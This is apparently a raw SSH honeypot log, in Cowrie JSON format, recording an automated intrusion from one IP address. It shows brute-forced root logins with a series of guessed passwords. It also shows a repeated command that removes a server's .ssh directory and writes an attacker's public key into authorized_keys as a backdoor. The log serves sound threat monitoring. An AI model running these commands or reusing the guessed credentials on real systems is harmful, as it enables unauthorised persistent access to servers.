{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58704,"dst_ip":"1.2.3.4","dst_port":22,"session":"de7ac3ae07dc","protocol":"ssh","message":"New connection: 212.227.235.229:58704 (1.2.3.4:22) [session: de7ac3ae07dc]","sensor":"my-vps","timestamp":"2025-09-08T22:16:12.580221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:12.581035Z","src_ip":"212.227.235.229","session":"de7ac3ae07dc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:16:12.700675Z","src_ip":"212.227.235.229","session":"ae4f7417382a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:12.890372Z","src_ip":"212.227.235.229","session":"de7ac3ae07dc"}
{"eventid":"cowrie.login.success","username":"root","password":"Madrid2020","message":"login attempt [root/Madrid2020] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:16:13.102101Z","src_ip":"212.227.235.229","session":"c286785c6349"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53814,"dst_ip":"1.2.3.4","dst_port":22,"session":"f14b529ddb80","protocol":"ssh","message":"New connection: 212.227.235.229:53814 (1.2.3.4:22) [session: f14b529ddb80]","sensor":"my-vps","timestamp":"2025-09-08T22:16:13.529438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:13.595629Z","src_ip":"212.227.235.229","session":"f14b529ddb80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:16:13.814353Z","src_ip":"212.227.235.229","session":"c286785c6349"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:16:13.815105Z","src_ip":"212.227.235.229","session":"c286785c6349"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:16:13.816091Z","src_ip":"212.227.235.229","session":"c286785c6349"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:13.817475Z","src_ip":"212.227.235.229","session":"f14b529ddb80"}
{"eventid":"cowrie.session.closed","duration":"18.1","message":"Connection lost after 18.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:13.916550Z","src_ip":"212.227.235.229","session":"507167f18260"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:14.059880Z","src_ip":"212.227.235.229","session":"ae4f7417382a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:14.145115Z","src_ip":"212.227.235.229","session":"c286785c6349"}
{"eventid":"cowrie.login.success","username":"root","password":"123qwe,./","message":"login attempt [root/123qwe,./] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:16:14.167102Z","src_ip":"212.227.235.229","session":"de7ac3ae07dc"}
{"eventid":"cowrie.login.success","username":"root","password":"0.0.0.0.","message":"login attempt [root/0.0.0.0.] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:16:14.708186Z","src_ip":"212.227.235.229","session":"f14b529ddb80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:16:14.804918Z","src_ip":"212.227.235.229","session":"de7ac3ae07dc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:16:14.805914Z","src_ip":"212.227.235.229","session":"de7ac3ae07dc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:16:14.807338Z","src_ip":"212.227.235.229","session":"de7ac3ae07dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:16:14.890872Z","src_ip":"212.227.235.229","session":"c286785c6349"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:16:14.891723Z","src_ip":"212.227.235.229","session":"c286785c6349"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:16:15.201884Z","src_ip":"212.227.235.229","session":"f14b529ddb80"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:16:15.202849Z","src_ip":"212.227.235.229","session":"f14b529ddb80"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:16:15.204134Z","src_ip":"212.227.235.229","session":"f14b529ddb80"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:15.205431Z","src_ip":"212.227.235.229","session":"de7ac3ae07dc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:16:15.222008Z","src_ip":"212.227.235.229","session":"c286785c6349"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:15.223196Z","src_ip":"212.227.235.229","session":"c286785c6349"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:15.408305Z","src_ip":"212.227.235.229","session":"f14b529ddb80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48952,"dst_ip":"1.2.3.4","dst_port":22,"session":"bad83616b180","protocol":"ssh","message":"New connection: 212.227.235.229:48952 (1.2.3.4:22) [session: bad83616b180]","sensor":"my-vps","timestamp":"2025-09-08T22:16:15.547048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:15.548296Z","src_ip":"212.227.235.229","session":"bad83616b180"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43362,"dst_ip":"1.2.3.4","dst_port":22,"session":"50936cb7d04a","protocol":"ssh","message":"New connection: 212.227.235.229:43362 (1.2.3.4:22) [session: 50936cb7d04a]","sensor":"my-vps","timestamp":"2025-09-08T22:16:15.552087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:15.552997Z","src_ip":"212.227.235.229","session":"50936cb7d04a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:15.720639Z","src_ip":"212.227.235.229","session":"bad83616b180"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:16:15.799589Z","src_ip":"212.227.235.229","session":"de7ac3ae07dc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:16:15.800322Z","src_ip":"212.227.235.229","session":"de7ac3ae07dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:16:15.892891Z","src_ip":"212.227.235.229","session":"f14b529ddb80"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:16:15.893923Z","src_ip":"212.227.235.229","session":"f14b529ddb80"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:15.897769Z","src_ip":"212.227.235.229","session":"50936cb7d04a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:16:16.100852Z","src_ip":"212.227.235.229","session":"f14b529ddb80"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:16.101785Z","src_ip":"212.227.235.229","session":"f14b529ddb80"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:16:16.111658Z","src_ip":"212.227.235.229","session":"de7ac3ae07dc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:16.112478Z","src_ip":"212.227.235.229","session":"de7ac3ae07dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53826,"dst_ip":"1.2.3.4","dst_port":22,"session":"76f94af96dde","protocol":"ssh","message":"New connection: 212.227.235.229:53826 (1.2.3.4:22) [session: 76f94af96dde]","sensor":"my-vps","timestamp":"2025-09-08T22:16:16.303131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:16.303690Z","src_ip":"212.227.235.229","session":"76f94af96dde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58708,"dst_ip":"1.2.3.4","dst_port":22,"session":"668f74081df6","protocol":"ssh","message":"New connection: 212.227.235.229:58708 (1.2.3.4:22) [session: 668f74081df6]","sensor":"my-vps","timestamp":"2025-09-08T22:16:16.305242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:16.306351Z","src_ip":"212.227.235.229","session":"668f74081df6"}
{"eventid":"cowrie.login.success","username":"root","password":"123456aa@","message":"login attempt [root/123456aa@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:16:16.455736Z","src_ip":"212.227.235.229","session":"bad83616b180"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:16.507565Z","src_ip":"212.227.235.229","session":"76f94af96dde"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:16.558701Z","src_ip":"212.227.235.229","session":"668f74081df6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:16:16.878493Z","src_ip":"212.227.235.229","session":"bad83616b180"}
